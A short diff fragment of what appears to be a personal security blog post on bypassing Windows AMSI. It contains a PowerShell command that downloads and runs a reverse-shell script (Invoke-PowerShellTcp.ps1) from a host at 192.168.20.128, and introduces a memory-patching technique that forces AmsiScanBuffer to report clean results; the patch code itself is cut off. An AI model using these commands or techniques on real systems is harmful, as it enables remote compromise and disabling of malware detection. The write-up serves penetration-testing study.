Kwangyun/Kwangyun.github.io/_posts/2023-05-10-Bypassing-AMSI-2023.md

 IEX (New-Object Net.WebClient).DownloadString('http://192.168.20.128:8443/Invoke-PowerShellTcp.ps1')
 ```
 However, as seen above, AMSI sucessfully flags the activity as  `malicious` and proceeds to block the reverse shell connection.
+## Memory Patching
-In order to bypass the AMSI, the tester
+In order to bypass AMSI, the tester utilzed the following payload.
+This patches the AmsiScanBuffer() function in order to return always `AMSI_RESULT_CLEAN` which indicates that no detection has been found.
 ```bash
 $thing = @"
 // thing